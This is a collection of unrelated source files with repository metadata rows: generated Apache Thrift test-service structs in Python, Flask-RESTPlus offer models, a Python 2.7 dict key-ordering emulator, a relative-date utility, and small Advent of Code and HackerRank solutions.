self.success[_key350] = _val351
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testInsanity_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.MAP, 0)
oprot.writeMapBegin(TType.I64, TType.MAP, len(self.success))
for kiter359, viter360 in self.success.items():
oprot.writeI64(kiter359)
oprot.writeMapBegin(TType.I32, TType.STRUCT, len(viter360))
for kiter361, viter362 in viter360.items():
oprot.writeI32(kiter361)
viter362.write(oprot)
oprot.writeMapEnd()
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testInsanity_result)
testInsanity_result.thrift_spec = (
(0, TType.MAP, 'success', (TType.I64, None, TType.MAP, (TType.I32, None, TType.STRUCT, [Insanity, None], False), False), None, ), # 0
)
class testMulti_args(object):
"""
Attributes:
- arg0
- arg1
- arg2
- arg3
- arg4
- arg5
"""
__slots__ = (
'arg0',
'arg1',
'arg2',
'arg3',
'arg4',
'arg5',
)
def __init__(self, arg0=None, arg1=None, arg2=None, arg3=None, arg4=None, arg5=None,):
self.arg0 = arg0
self.arg1 = arg1
self.arg2 = arg2
self.arg3 = arg3
self.arg4 = arg4
self.arg5 = arg5
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BYTE:
self.arg0 = iprot.readByte()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.arg1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.arg2 = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.MAP:
self.arg3 = {}
(_ktype364, _vtype365, _size363) = iprot.readMapBegin()
for _i367 in range(_size363):
_key368 = iprot.readI16()
_val369 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.arg3[_key368] = _val369
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.arg4 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I64:
self.arg5 = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMulti_args')
if self.arg0 is not None:
oprot.writeFieldBegin('arg0', TType.BYTE, 1)
oprot.writeByte(self.arg0)
oprot.writeFieldEnd()
if self.arg1 is not None:
oprot.writeFieldBegin('arg1', TType.I32, 2)
oprot.writeI32(self.arg1)
oprot.writeFieldEnd()
if self.arg2 is not None:
oprot.writeFieldBegin('arg2', TType.I64, 3)
oprot.writeI64(self.arg2)
oprot.writeFieldEnd()
if self.arg3 is not None:
oprot.writeFieldBegin('arg3', TType.MAP, 4)
oprot.writeMapBegin(TType.I16, TType.STRING, len(self.arg3))
for kiter370, viter371 in self.arg3.items():
oprot.writeI16(kiter370)
oprot.writeString(viter371.encode('utf-8') if sys.version_info[0] == 2 else viter371)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.arg4 is not None:
oprot.writeFieldBegin('arg4', TType.I32, 5)
oprot.writeI32(self.arg4)
oprot.writeFieldEnd()
if self.arg5 is not None:
oprot.writeFieldBegin('arg5', TType.I64, 6)
oprot.writeI64(self.arg5)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testMulti_args)
testMulti_args.thrift_spec = (
None, # 0
(1, TType.BYTE, 'arg0', None, None, ), # 1
(2, TType.I32, 'arg1', None, None, ), # 2
(3, TType.I64, 'arg2', None, None, ), # 3
(4, TType.MAP, 'arg3', (TType.I16, None, TType.STRING, 'UTF8', False), None, ), # 4
(5, TType.I32, 'arg4', None, None, ), # 5
(6, TType.I64, 'arg5', None, None, ), # 6
)
class testMulti_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = Xtruct()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMulti_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testMulti_result)
testMulti_result.thrift_spec = (
(0, TType.STRUCT, 'success', [Xtruct, None], None, ), # 0
)
class testException_args(object):
"""
Attributes:
- arg
"""
__slots__ = (
'arg',
)
def __init__(self, arg=None,):
self.arg = arg
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.arg = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testException_args')
if self.arg is not None:
oprot.writeFieldBegin('arg', TType.STRING, 1)
oprot.writeString(self.arg.encode('utf-8') if sys.version_info[0] == 2 else self.arg)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testException_args)
testException_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'arg', 'UTF8', None, ), # 1
)
class testException_result(object):
"""
Attributes:
- err1
"""
__slots__ = (
'err1',
)
def __init__(self, err1=None,):
self.err1 = err1
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err1 = Xception()
self.err1.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testException_result')
if self.err1 is not None:
oprot.writeFieldBegin('err1', TType.STRUCT, 1)
self.err1.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testException_result)
testException_result.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err1', [Xception, None], None, ), # 1
)
class testMultiException_args(object):
"""
Attributes:
- arg0
- arg1
"""
__slots__ = (
'arg0',
'arg1',
)
def __init__(self, arg0=None, arg1=None,):
self.arg0 = arg0
self.arg1 = arg1
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.arg0 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.arg1 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMultiException_args')
if self.arg0 is not None:
oprot.writeFieldBegin('arg0', TType.STRING, 1)
oprot.writeString(self.arg0.encode('utf-8') if sys.version_info[0] == 2 else self.arg0)
oprot.writeFieldEnd()
if self.arg1 is not None:
oprot.writeFieldBegin('arg1', TType.STRING, 2)
oprot.writeString(self.arg1.encode('utf-8') if sys.version_info[0] == 2 else self.arg1)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testMultiException_args)
testMultiException_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'arg0', 'UTF8', None, ), # 1
(2, TType.STRING, 'arg1', 'UTF8', None, ), # 2
)
class testMultiException_result(object):
"""
Attributes:
- success
- err1
- err2
"""
__slots__ = (
'success',
'err1',
'err2',
)
def __init__(self, success=None, err1=None, err2=None,):
self.success = success
self.err1 = err1
self.err2 = err2
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = Xtruct()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err1 = Xception()
self.err1.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.err2 = Xception2()
self.err2.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMultiException_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.err1 is not None:
oprot.writeFieldBegin('err1', TType.STRUCT, 1)
self.err1.write(oprot)
oprot.writeFieldEnd()
if self.err2 is not None:
oprot.writeFieldBegin('err2', TType.STRUCT, 2)
self.err2.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testMultiException_result)
testMultiException_result.thrift_spec = (
(0, TType.STRUCT, 'success', [Xtruct, None], None, ), # 0
(1, TType.STRUCT, 'err1', [Xception, None], None, ), # 1
(2, TType.STRUCT, 'err2', [Xception2, None], None, ), # 2
)
class testOneway_args(object):
"""
Attributes:
- secondsToSleep
"""
__slots__ = (
'secondsToSleep',
)
def __init__(self, secondsToSleep=None,):
self.secondsToSleep = secondsToSleep
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.secondsToSleep = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testOneway_args')
if self.secondsToSleep is not None:
oprot.writeFieldBegin('secondsToSleep', TType.I32, 1)
oprot.writeI32(self.secondsToSleep)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testOneway_args)
testOneway_args.thrift_spec = (
None, # 0
(1, TType.I32, 'secondsToSleep', None, None, ), # 1
)
fix_spec(all_structs)
del all_structs
| [
"[email protected]"
] | |
67b2a9dd24d52509e01bfca824c18c8a25229ef6 | 52e2224538bfa7e69f9e0688dc49c53a247070d7 | /app/api/serializers/offers.py | 5a8539cca5bad81d59223205eb8855f955c825cc | [] | no_license | averdier/epsi_my_learning_chain_api | 2958f8ab6333e87f8b5d1a97f8d485361cdcba9d | ea85dced579f6285f3acd0edd0d64ead4f6f2332 | refs/heads/master | 2022-12-09T19:56:27.836637 | 2018-04-13T09:23:46 | 2018-04-13T09:23:46 | 129,227,310 | 1 | 0 | null | 2022-12-08T01:02:30 | 2018-04-12T09:32:18 | Python | UTF-8 | Python | false | false | 1,666 | py | # -*- coding: utf-8 -*-
from flask_restplus import fields
from .nested import facilitator_nested, api
offer_post_model = api.model('Offer POST model', {
'name': fields.String(required=True, min_length=4, description='Name'),
'tags': fields.List(fields.String(), required=False, description='Tags'),
'price': fields.Integer(required=True, min=0, description='Price'),
'description': fields.String(required=False, description='Description')
})
offer_patch_model = api.model('Offer PATCH model', {
'name': fields.String(required=False, min_length=4, description='Name'),
'tags': fields.List(fields.String(), required=False, description='Tags'),
'price': fields.Integer(required=False, min=0, description='Price'),
'description': fields.String(required=False, description='Description')
})
offer_minimal_model = api.model('Offer minimal model', {
'id': fields.String(required=True, description='Offer ID'),
'facilitator_id': fields.String(required=True, description='Facilitator ID', attribute=lambda o: o.facilitator.id),
'name': fields.String(required=True, description='Name'),
'tags': fields.List(fields.String(), required=True, description='Tags'),
'price': fields.Integer(required=True, description='Price')
})
offer_model = api.inherit('Offer model', offer_minimal_model, {
'description': fields.String(required=True, description='Description'),
'facilitator': fields.Nested(facilitator_nested, required=True, description='Facilitator')
})
offer_container = api.model('Offer container', {
'offers': fields.List(fields.Nested(offer_minimal_model), required=True, description='Offers list')
}) | [
"[email protected]"
] | |
68bce261a32438af944cc7a39d301fd1bed0c9b1 | e260e72c6d8f24ef250173025b2ecf129960cf03 | /src/python/py27hash/key.py | 34b6e925ab62923b6e110a518a7371a6aa5cb145 | [
"MIT"
] | permissive | neuml/py27hash | 1cdce30b9480ff338ca0488c2d80a196fc783370 | 4d814de4ab616f33bb2d74c687e74fa57c399a56 | refs/heads/master | 2022-11-23T21:21:56.220330 | 2022-11-20T12:45:21 | 2022-11-20T12:45:21 | 223,510,843 | 11 | 3 | MIT | 2022-03-27T14:46:02 | 2019-11-23T00:57:33 | Python | UTF-8 | Python | false | false | 5,425 | py | """
Compatibility methods to support Python 2.7 style key iteration in Python 3.X+
This is designed for compatibility not performance.
"""
import ctypes
# pylint: disable = E0401
from .hash import Hash
class Keys(object):
"""
Compatibility class to support Python 2.7 style iteration in Python 3.X+
Logic ported from the 2.7 Python branch: cpython/Objects/dictobject.c
Logic ported from the 2.7 Python branch: cpython/Objects/setobject.c
"""
# Min dict size
MINSIZE = 8
# Hash collisions
PERTURB_SHIFT = 5
def __init__(self):
"""
Initializes a keys object.
"""
self.keylist = []
self.keysort = None
# Python 2 dict default size
self.mask = Keys.MINSIZE - 1
def __setstate__(self, state):
"""
Overrides default pickling object to force re-adding all keys and match Python 2.7 deserialization logic.
Args:
state: input state
"""
self.__dict__ = state
keys = self.keys()
# Clear keys and re-add to match deserialization logic
self.__init__()
for k in keys:
self.add(k)
def __iter__(self):
"""
Default iterator.
Returns:
iterator
"""
return iter(self.keys())
def keys(self):
"""
Returns keys ordered using Python 2.7's iteration algorithm.
Method: static PyDictEntry *lookdict(PyDictObject *mp, PyObject *key, register long hash)
Returns:
list of keys
"""
if not self.keysort:
keys = []
hids = set()
for k in self.keylist:
# C API uses unsigned values
h = ctypes.c_size_t(Hash.hash(k)).value
i = h & self.mask
hid = i
perturb = h
while hid in hids:
i = (i << 2) + i + perturb + 1
hid = i & self.mask
perturb >>= Keys.PERTURB_SHIFT
keys.append((hid, k))
hids.add(hid)
# Cache result - performance - clear if more keys added
self.keysort = [v for (k, v) in sorted(keys, key=lambda x: x[0])]
return self.keysort
def add(self, key):
"""
Called each time a new item is inserted. Tracks via insertion order and will maintain the same order
as a dict in Python 2.7.
Method: static int dict_set_item_by_hash_or_entry(register PyObject *op, PyObject *key, long hash,
PyDictEntry *ep, PyObject *value)
Args:
key: key to add
"""
# Add key to list. If this is a replace/update then size won't change.
if key and key not in self.keylist:
# Append key to list
self.keylist.append(key)
# Clear cached keys
self.keysort = None
# Resize dict if 2/3 capacity
if len(self.keylist) * 3 >= ((self.mask + 1) * 2):
# Reset key list to simulate the dict resize + copy operation
self.keylist = self.keys()
self.keysort = None
self.setMask()
def remove(self, key):
"""
Remove a key from the backing list.
Args:
key: key to remove
"""
if key in self.keylist:
# Remove key from list
self.keylist.remove(key)
# Clear cached keys
self.keysort = None
def merge(self, d):
"""
Merges keys from an existing iterable into this key list.
Method: int PyDict_Merge(PyObject *a, PyObject *b, int override)
Args:
d: input dict
"""
# PyDict_Merge initial merge size is double the size of the current + incoming dict
if (len(self.keylist) + len(d)) * 3 >= (self.mask + 1) * 2:
self.setMask((len(self.keylist) + len(d)) * 2)
# Copy actual keys
for k in d:
self.add(k)
def copy(self):
"""
Makes a copy of self.
Method: PyObject *PyDict_Copy(PyObject *o)
Returns:
copy of self
"""
# Copy creates a new object and merges keys in
new = Keys()
new.merge(self.keys())
return new
def pop(self):
"""
Pops the top element from the sorted keys if it exists. Returns None otherwise.
Method: static PyObject *dict_popitem(PyDictObject *mp)
Return:
top element or None if Keys is empty
"""
if self.keylist:
# Pop the top element
value = self.keys()[0]
self.remove(value)
return value
return None
def setMask(self, request=None):
"""
Key based on the total size of this dict. Matches ma_mask in Python 2.7's dict.
Method: static int dictresize(PyDictObject *mp, Py_ssize_t minused)
"""
if not request:
length = len(self.keylist)
# Python 2 dict increases by a factor of 4 for small dicts, 2 for larger ones
request = length * (2 if length > 50000 else 4)
newsize = Keys.MINSIZE
while newsize <= request:
newsize <<= 1
self.mask = newsize - 1
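# Usage sketch (illustrative only; assumes Hash.hash reproduces CPython 2.7
# string hashing, so iteration follows 2.7 dict order rather than insertion order):
#
#   keys = Keys()
#   for k in ("alpha", "beta", "gamma"):
#       keys.add(k)
#   list(keys)  # -> keys in Python 2.7 dict iteration order, not insertion order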
| [
"[email protected]"
] | |
fc451ae5171ff6413eb5371ac7f7c792cf544866 | e874e3b4312b2beebaa42fa1489b50c618055190 | /venv/Lib/site-packages/onyx/core/datatypes/rdate.py | 96d0f5c2af82ec4900dac49253b490f6f1a8a386 | [] | no_license | CarlosDinart/PUC-SP | 611a9acb6a82b7db2174d2d439b5666db48a530e | 5f5f1ea4b9c55c7d20b2dcd92c461b3d8ebbb664 | refs/heads/master | 2023-01-23T06:46:42.492764 | 2020-12-09T19:41:01 | 2020-12-09T19:41:01 | 320,058,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,973 | py | ###############################################################################
#
# Copyright: (c) 2015 Carlo Sbraccia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###############################################################################
from .date import Date
from .holiday_cal import HolidayCalendar
from dateutil.relativedelta import relativedelta, MO, WE, FR
import datetime
import re
__all__ = ["RDate"]
QUARTER_FIRST_MTH = [1, 1, 1, 4, 4, 4, 7, 7, 7, 10, 10, 10]
SPLITTER = re.compile(r"([\+,\-]\d*\w+)")
OPERANDS = {"+", "-"}
###############################################################################
class RDate(object):
"""
A date shift object that can be added to Dates to generate shifted dates.
"""
__slots__ = ("date_rule", "calendar")
# -------------------------------------------------------------------------
def __init__(self, date_rule, calendar=None):
"""
Inputs:
date_rule - a string specifying relative shift (see below for valid
date rules).
calendar - a holiday calendar used to identify business days
Rule definitions:
d = add calendar day
b = add business day
w = add calendar week
m = add calendar month
y = add calendar year
c = go to the required day in the month
e = go to end of month (ignores num)
J = go to first calendar day of month (ignores num)
M = go to closest Monday as specified by num
W = go to closest Wednesday as specified by num
F = go to closest Friday as specified by num
q = go to beginning of the quarter (ignores num)
Q = go to end of the quarter (ignores num)
A = go to beginning of the year (ignores num)
E = go to end of the year (ignores num)
"""
# --- use parent class setattr because RDate is implemented as an
# immutable class
super().__setattr__("date_rule", date_rule)
super().__setattr__("calendar", calendar or HolidayCalendar())
# -------------------------------------------------------------------------
def __setattr__(self, attr, value):
raise AttributeError("attribute '{0:s}' of RDate is not settable "
"as RDate is an immutable class".format(attr))
# -------------------------------------------------------------------------
def apply_rule(self, d):
# --- rule processing. If no operator is defined assume it's "+"
if self.date_rule[0] in OPERANDS:
atomic = SPLITTER.split(self.date_rule)[1::2]
else:
atomic = SPLITTER.split("+" + self.date_rule)[1::2]
# --- iteratively apply each atomic rule
for rule in atomic:
op = rule[0:-1]
r = rule[-1]
if op in OPERANDS:
op += "1"
# --- look for the proper rule to apply
if r == "d":
d += relativedelta(days=int(op))
elif r == "b":
nb = int(op[1:])
op1 = int(op[0] + "1")
if nb == 0 and self.calendar.is_holiday(d):
# --- go to the next (or previous) business day only if
# d is not already a business day
nb = 1
for i in range(nb):
d += relativedelta(days=op1)
while self.calendar.is_holiday(d):
d += relativedelta(days=op1)
elif r == "w":
d += relativedelta(weeks=int(op))
elif r == "m":
d += relativedelta(months=int(op))
elif r == "y":
d += relativedelta(years=int(op))
elif r == "c":
d += relativedelta(day=int(op))
elif r == "e":
d += relativedelta(day=31)
elif r == "J":
d += relativedelta(day=1)
elif r == "M":
d += relativedelta(weekday=MO(int(op)))
elif r == "W":
d += relativedelta(weekday=WE(int(op)))
elif r == "F":
d += relativedelta(weekday=FR(int(op)))
elif r == "q":
d = d.replace(day=1, month=QUARTER_FIRST_MTH[d.month-1])
elif r == "Q":
d = d.replace(day=1, month=QUARTER_FIRST_MTH[d.month-1]+2)
d += relativedelta(day=31)
elif r == "A":
d = d.replace(day=1, month=1)
elif r == "E":
d = d.replace(day=31, month=12)
else:
raise NameError("Atomic rule {0:s} is unknown. "
"Full rule is {1:s}".format(r, rule))
# --- conversion to Date is needed here because applying a
# relativedelta to a Date returns a datetime object
return Date.parse(d)
# -------------------------------------------------------------------------
# relative date algebra
def __radd__(self, date):
        # --- check against the superclass datetime.datetime
if not isinstance(date, (datetime.date, datetime.datetime)):
raise ValueError("RDate can only be applied to a Date. "
"{0!s} was passed instead".format(date.__class__))
return self.apply_rule(date)
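# --- usage sketch (illustrative only; assumes Date.parse accepts a
# --- datetime.date and a default HolidayCalendar with no extra holidays):
#
#   d = Date.parse(datetime.date(2015, 1, 15))
#   d + RDate("+1m+e")   # forward one month, then to the end of that month
#   d + RDate("+0b")     # roll forward to a business day if d is a holiday
#   d + RDate("+1F")     # go to the next Friday on or after d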
| [
"[email protected]"
] | |
6828a845e8b4a33abe9c434db3f96ee98f8001fa | 36b624c0b7f0e691772f7521695c02f0709f9f89 | /day8.py | cc9d00263a5a71ed2da284db2e9df17031b7dd4f | [] | no_license | alex-huff/advent-of-code-2020 | 4ee30fdcd6b67aceb0c0fb919de9a18f61d9987c | 701cfcba1c952710c0bf0b9336f670141a9ac276 | refs/heads/main | 2023-02-02T13:51:37.722815 | 2020-12-22T01:32:21 | 2020-12-22T01:32:21 | 323,081,866 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,564 | py | def getValueBeforeLoop(code):
acc = 0
pc = 0
executionSet = set()
finished = False
while True:
if pc == len(code) - 1:
finished = True
break
if pc in executionSet:
break
inst = code[pc][0]
value = code[pc][1]
executionSet.add(pc)
if inst == NOP:
pc += 1
elif inst == ACC:
acc += value
pc += 1
elif inst == JMP:
pc += value
return (acc, finished)
def getInstruction(line, iSet):
operation = iSet.index(line[:line.index(' ')])
value = int(line[line.index(' ') + 1:])
return [operation, value]
raw_input = []
NOP = 0
ACC = 1
JMP = 2
instructionSet = ['nop', 'acc', 'jmp']
with open('input/day8input.txt') as file:
raw_input = [line.rstrip() for line in file]
code = [getInstruction(line, instructionSet) for line in raw_input]
# part 1
print(getValueBeforeLoop(code))
# part 2
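# brute force: flip one nop<->jmp at a time, re-run, and stop at the first
# flip whose run terminates (reaches the end) instead of looping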
for i, operation in enumerate(code):
if operation[0] == NOP:
operation[0] = JMP
result = getValueBeforeLoop(code)
if result[1] == True:
print(i, result[0], operation[0], operation[1])
break
else:
# revert
operation[0] = NOP
elif operation[0] == JMP:
operation[0] = NOP
result = getValueBeforeLoop(code)
if result[1] == True:
print(i, result[0], operation[0], operation[1])
break
else:
# revert
operation[0] = JMP
| [
"[email protected]"
] | |
301d507040d644d6ddc8e77d11c75c42c9c382f2 | 81fe7f2faea91785ee13cb0297ef9228d832be93 | /HackerRank/Contests/101Hack42/cutting_paper_squares.py | fc51e8c2e28f90db86021f38bf68df6bf3be5567 | [] | no_license | blegloannec/CodeProblems | 92349c36e1a35cfc1c48206943d9c2686ea526f8 | 77fd0fa1f1a519d4d55265b9a7abf12f1bd7d19e | refs/heads/master | 2022-05-16T20:20:40.578760 | 2021-12-30T11:10:25 | 2022-04-22T08:11:07 | 54,330,243 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | #!/usr/bin/env python
import sys
# each straight cut increases the piece count by exactly one, so going from
# 1 piece to n*m unit squares always takes n*m-1 cuts (any cutting order is minimal)
n,m = map(int,sys.stdin.readline().split())
print n*m-1
| [
"[email protected]"
] | |
